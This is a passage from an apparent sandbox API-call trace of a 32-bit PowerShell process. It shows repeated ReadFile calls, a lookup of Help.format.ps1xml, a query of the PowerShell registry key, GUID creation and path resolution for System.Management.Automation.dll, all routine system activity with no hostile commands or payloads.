(hFile=0x358) returned 0x1 [0076.528] SetErrorMode (uMode=0x1) returned 0x1 [0076.529] GetFileType (hFile=0x358) returned 0x1 [0076.529] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.530] GetLastError () returned 0x0 [0076.531] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.532] GetLastError () returned 0x0 [0076.532] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.532] GetLastError () returned 0x0 [0076.532] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.532] GetLastError () returned 0x0 [0076.532] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.532] GetLastError () returned 0x0 [0076.533] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.533] GetLastError () returned 0x0 [0076.533] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.533] GetLastError () returned 0x0 [0076.533] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.533] GetLastError () returned 0x0 [0076.534] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.534] GetLastError () returned 0x0 [0076.534] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.534] GetLastError () returned 0x0 [0076.534] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.534] GetLastError () returned 0x0 [0076.534] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.535] GetLastError () returned 0x0 [0076.535] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.535] GetLastError () returned 0x0 [0076.535] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.535] GetLastError () returned 0x0 [0076.535] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.535] GetLastError () returned 0x0 [0076.536] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.536] GetLastError () returned 0x0 [0076.538] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.538] GetLastError () returned 0x0 [0076.538] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.538] GetLastError () returned 0x0 [0076.538] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.539] GetLastError () returned 0x0 [0076.539] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.539] GetLastError () returned 0x0 [0076.539] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.539] GetLastError () returned 0x0 [0076.539] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.539] GetLastError () returned 0x0 [0076.539] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.539] GetLastError () returned 0x0 [0076.539] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.540] GetLastError () returned 0x0 [0076.540] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.540] GetLastError () returned 0x0 [0076.540] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.540] GetLastError () returned 0x0 [0076.540] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.540] GetLastError () returned 0x0 [0076.540] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.540] GetLastError () returned 0x0 [0076.541] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.541] GetLastError () returned 0x0 [0076.541] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.541] GetLastError () returned 0x0 [0076.541] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.541] GetLastError () returned 0x0 [0076.541] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.541] GetLastError () returned 0x0 [0076.544] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.544] GetLastError () returned 0x0 [0076.544] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.545] GetLastError () returned 0x0 [0076.545] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.545] GetLastError () returned 0x0 [0076.545] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.545] GetLastError () returned 0x0 [0076.545] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.545] GetLastError () returned 0x0 [0076.545] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.545] GetLastError () returned 0x0 [0076.546] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.546] GetLastError () returned 0x0 [0076.546] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.546] GetLastError () returned 0x0 [0076.547] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.547] GetLastError () returned 0x0 [0076.547] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.547] GetLastError () returned 0x0 [0076.547] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.547] GetLastError () returned 0x0 [0076.547] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.547] GetLastError () returned 0x0 [0076.547] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.548] GetLastError () returned 0x0 [0076.548] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.548] GetLastError () returned 0x0 [0076.548] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.548] GetLastError () returned 0x0 [0076.548] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.548] GetLastError () returned 0x0 [0076.548] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.548] GetLastError () returned 0x0 [0076.549] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.549] GetLastError () returned 0x0 [0076.549] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.549] GetLastError () returned 0x0 [0076.549] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.549] GetLastError () returned 0x0 [0076.549] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.549] GetLastError () returned 0x0 [0076.550] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.550] GetLastError () returned 0x0 [0076.550] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.550] GetLastError () returned 0x0 [0076.550] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.550] GetLastError () returned 0x0 [0076.550] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.550] GetLastError () returned 0x0 [0076.551] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.551] GetLastError () returned 0x0 [0076.551] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.551] GetLastError () returned 0x0 [0076.551] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.551] GetLastError () returned 0x0 [0076.551] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.551] GetLastError () returned 0x0 [0076.552] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.552] GetLastError () returned 0x0 [0076.552] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0xf37, lpOverlapped=0x0) returned 1 [0076.552] GetLastError () returned 0x0 [0076.552] ReadFile (in: hFile=0x358, lpBuffer=0x2ec0faf, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec0faf*, lpNumberOfBytesRead=0xae254*=0x0, lpOverlapped=0x0) returned 1 [0076.552] GetLastError () returned 0x0 [0076.552] ReadFile (in: hFile=0x358, lpBuffer=0x2ec18d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2ec18d8*, lpNumberOfBytesRead=0xae254*=0x0, lpOverlapped=0x0) returned 1 [0076.552] GetLastError () returned 0x0 [0076.552] CloseHandle (hObject=0x358) returned 1 [0076.552] GetLastError () returned 0x0 [0076.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaddb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0076.553] GetLastError () returned 0x0 [0076.553] SetErrorMode (uMode=0x1) returned 0x1 [0076.553] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee28d4 | out: lpFileInformation=0x2ee28d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0076.553] GetLastError () returned 0x0 [0076.553] SetErrorMode (uMode=0x1) returned 0x1 [0076.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0076.553] GetLastError () returned 0x0 [0076.553] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae1d8 | out: phkResult=0xae1d8*=0x358) returned 0x0 [0076.553] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae220, lpData=0x0, lpcbData=0xae21c*=0x0 | out: lpType=0xae220*=0x1, lpData=0x0, lpcbData=0xae21c*=0x56) returned 0x0 [0076.553] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae220, lpData=0x54b630, lpcbData=0xae21c*=0x56 | out: lpType=0xae220*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae21c*=0x56) returned 0x0 [0076.554] RegCloseKey (hKey=0x358) returned 0x0 [0076.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0076.554] GetLastError () returned 0x0 [0076.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadd14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0076.554] GetLastError () returned 0x0 [0076.581] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xffb1b9ea, Data2=0xc9f2, Data3=0x4f19, Data4=([0]=0x85, [1]=0x0, [2]=0xb9, [3]=0x22, [4]=0x1e, [5]=0x28, [6]=0x8d, [7]=0x7b))) returned 0x0 [0076.581] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x20f029a1, Data2=0x4a0e, Data3=0x4556, Data4=([0]=0xa2, [1]=0x61, [2]=0x7c, [3]=0xda, [4]=0x9f, [5]=0xa6, [6]=0xd9, [7]=0xac))) returned 0x0 [0076.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.582] GetLastError () returned 0x0 [0076.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.582] GetLastError () returned 0x0 [0076.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.582] GetLastError () returned 0x0 [0076.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.582] GetLastError () returned 0x0 [0076.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.627] GetLastError () returned 0x0 [0076.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.627] GetLastError () returned 0x0 [0076.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.627] GetLastError () returned 0x0 [0076.627] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x8acdfc25, Data2=0xdada, Data3=0x40ec, Data4=([0]=0xbe, [1]=0x60, [2]=0xe, [3]=0xa5, [4]=0x8, [5]=0x56, [6]=0xf0, [7]=0xb3))) returned 0x0 [0076.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad958, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.627] GetLastError () returned 0x0 [0076.627] GetFullPathNameW (in: 